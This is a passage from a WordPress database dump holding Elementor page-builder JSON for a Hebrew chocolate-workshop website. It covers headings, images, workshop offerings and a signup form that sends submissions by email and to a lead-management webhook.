\\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":53},\"typography_font_weight\":\"400\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":27},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\",\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"normal\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(1511,314,'_elementor_version','0.4'),(1514,315,'_wp_page_template','elementor_header_footer'),(1515,315,'_elementor_edit_mode','builder'),(1516,315,'_elementor_template_type','post'),(1517,315,'_elementor_data','[{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"label_typography_typography\":\"custom\",\"label_typography_font_family\":\"Open Sans Hebrew\",\"submit_actions\":[\"email\",\"webhook\"],\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34415&lm_key=9f1e095b29bf436098e66ca5f1512f34\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"},\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 